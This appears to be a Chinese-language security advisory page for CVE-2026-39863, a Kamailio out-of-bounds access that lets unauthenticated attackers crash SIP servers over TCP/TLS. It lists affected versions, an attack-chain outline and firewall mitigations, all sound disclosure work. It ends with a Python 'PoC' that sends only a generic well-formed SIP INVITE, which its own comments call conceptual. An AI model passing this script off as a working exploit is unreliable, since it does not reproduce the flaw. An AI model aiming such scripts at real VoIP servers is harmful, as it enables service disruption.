CVE-2026-39863 CVSS 7.5 高危

CVE-2026-39863 Kamailio越界访问致DoS漏洞

披露日期: 2026-04-08

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-39863

漏洞类型

越界访问

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Kamailio

漏洞概述

Kamailio是一款开源SIP信令服务器。在6.1.1、6.0.6和5.8.8版本之前，其核心组件存在越界访问漏洞。攻击者可通过TCP或TLS连接发送精心构造的数据包，触发该漏洞，导致服务进程崩溃，从而造成拒绝服务。该漏洞无需认证且无需用户交互即可被利用，风险较高。

技术细节

该漏洞源于Kamailio在处理TCP或TLS协议数据包时的解析逻辑缺陷。当攻击者向开启TCP或TLS监听的Kamailio服务端发送特制的畸形SIP数据包时，核心解析组件未能正确校验数据长度或索引，导致读取或写入操作越过预分配的缓冲区边界。这种越界内存访问会触发非法内存访问异常，进而导致Kamailio主进程崩溃。由于SIP协议常用于VoIP通信，服务中断将直接影响语音通话的建立与维持。

攻击链分析

STEP 1

信息收集

扫描网络寻找开启TCP或TLS端口（默认5060）的Kamailio服务器。

STEP 2

建立连接

攻击者与目标服务器建立TCP连接。

STEP 3

发送恶意数据包

通过已建立的连接发送精心构造的畸形SIP数据包。

STEP 4

触发漏洞

服务端解析数据包时发生越界访问，导致进程异常终止。

STEP 5

拒绝服务

Kamailio服务崩溃，合法用户无法使用VoIP服务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import socket

# Target Kamailio server with TCP listener
target_host = "127.0.0.1"
target_port = 5060

# Conceptual PoC: Sending a crafted SIP packet to trigger OOB read/write
# The specific payload structure depends on the vulnerable parsing function.
# This example sends a malformed SIP request over TCP.
payload = b"INVITE sip:target@kamailio SIP/2.0\r\n"
payload += b"Via: SIP/2.0/TCP attacker;branch=z9hG4bK-exploit\r\n"
payload += b"Content-Length: 0\r\n"
payload += b"\r\n"

try:
    print(f"[+] Connecting to {target_host}:{target_port}...")
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(5)
    s.connect((target_host, target_port))
    print("[+] Sending malicious payload...")
    s.send(payload)
    print("[+] Payload sent. Check if the service crashed.")
    s.close()
except Exception as e:
    print(f"[-] Error: {e}")

影响范围

Kamailio < 5.8.8

Kamailio < 6.0.6

Kamailio < 6.1.1

防御指南

临时缓解措施

如果无法立即升级，建议在防火墙或网络边界设备上阻断非受信IP对Kamailio TCP/TLS端口（通常为5060）的访问。若业务允许，可暂时禁用TCP/TLS监听器，仅使用UDP协议（需确认UDP不受此特定漏洞影响）。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表